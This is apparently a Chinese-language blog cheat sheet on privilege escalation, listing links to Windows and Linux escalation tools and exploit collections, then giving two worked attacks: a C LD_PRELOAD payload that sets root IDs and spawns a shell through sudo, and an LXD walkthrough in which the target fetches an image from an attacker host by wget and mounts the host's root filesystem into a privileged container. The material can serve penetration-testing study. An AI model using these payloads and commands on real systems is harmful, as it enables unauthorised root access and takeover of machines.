往期文章
工具合集
| 工具名称 | 下载地址 | 工具描述 |
|---|---|---|
| BadPotato | https://github.com/BeichenDream/BadPotato | Windows 权限提升 BadPotato |
| Databasetools | https://github.com/Hel10-Web/Databasetools | 一款用Go语言编写的数据库自动化提权工具,支持Mysql、MSSQL、Postgresql、Oracle、Redis |
| traitor | https://github.com/liamg/traitor | Linux自动提权 |
| hacking8 | https://i.hacking8.com/tiquan/ | 在线提权建议 |
| PEASS-ng | https://github.com/carlospolop/PEASS-ng | PEASS-权限提升令人敬畏的脚本套件 |
| kernelpop | https://github.com/spencerdodd/kernelpop | kernel privilege escalation enumeration and exploitation framework |
| Kernelhub | https://github.com/Ascotbe/Kernelhub | inux、macOS、Windows 内核提权漏洞集合,带编译环境、demo GIF 地图、漏洞详情、可执行文件(提权漏洞合集) |
| linux-exploit-suggester | https://github.com/The-Z-Labs/linux-exploit-suggester | Linux privilege escalation auditing tool |
| UACME | https://github.com/hfiref0x/UACME | 通过滥用内置的 Windows AutoElevate 后门来击败 Windows 用户帐户控制。 x86-32/x64 Windows 7/8/8.1/10/11(客户端,但某些方法也适用于服务器版本) |
| LinuxTQ | https://github.com/Getshell/LinuxTQ | Linux提权方法论 |
| Linux-Exploit-Suggester | https://github.com/mzet-/linux-exploit-suggester | 将目标补丁级别与 Linux 漏洞进行比较 数据库,以检测目标上可能缺失的补丁 |
| linux-kernel-exploits | https://github.com/SecWiki/linux-kernel-exploits | Linux提权集合 |
| windows提权集合 | https://github.com/SecWiki/windows-kernel-exploits | windows-kernel-exploits Windows平台提权漏洞集合 |
| win-exp-suggester | https://github.com/klsfct/getshell/tree/master/win-exp-suggester | 将目标补丁级别与 Microsoft 漏洞进行比较 数据库,以检测目标上可能缺失的补丁 |
| CoercedPotato | https://github.com/hackvens/CoercedPotato | 通过在Windows 10、Windows 11和Server 2022上滥用SeImpersonatePrivilege特权可以从LOCAL/NETWORK SERVICE提升为SYSTEM。 |
| dll_hijack | https://github.com/JKme/sb_kiddie-/tree/master/hacking_win/dll_hijack | dll劫持工具 |
windows、Linux、Mac提权脚本整理:夸克网盘分享
一些检测工具
用于检查可执行文件属性的 bash 脚本(如 PIE、RELRO、PaX、Canaries、ASLR、Fortify Source)
https://github.com/slimm609/checksec.sh
枚举基本系统信息并搜索常见的权限提升向量,例如世界可写文件、错误配置、明文密码和适用的漏洞利用
http://www.securitysift.com/download/linuxprivchecker.py
检查文件权限、cron 作业(如果可见)、弱凭据等
https://github.com/rebootuser/LinEnum
提权脚本
https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS
枚举工具
https://github.com/diego-treitos/linux-smart-enumeration
https://github.com/AlessandroZ/BeRoot
https://github.com/pentestmonkey/unix-privesc-check
Linux-Exploit-Suggester
https://github.com/mzet-/linux-exploit-suggester
https://github.com/PenturaLabs/Linux_Exploit_Suggester
https://github.com/jondonas/linux-exploit-suggester-2
https://github.com/belane/linux-soft-exploit-suggester
LD_Preload提权
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}
>gcc -fPIC -shared -o shell.so shell.c -nostartfiles
>ls -al shell.so
>sudo LD_PRELOAD=/tmp/shell.so find
>id
Lxd提权
查看文件是否存在
>which lxd & >which lxc
攻击机
>git clone https://github.com/saghul/lxd-alpine-builder.git
>cd lxd-alpine-builder
>./build-alpine
搞个web服务提供下载
>python -m SimpleHTTPServer
靶机下载
>wget http://192.168.1.107:8000/apline-v3.10-x86_64-20191008_1227.tar.gz
>lxc image import ./alpine-v3.10-x86_64-20191008_1227.tar.gz --alias myimage
>lxc image list
>lxc init myimage ignite -c security.privileged=true
>lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
>lxc start ignite
>lxc exec ignite /bin/sh
>id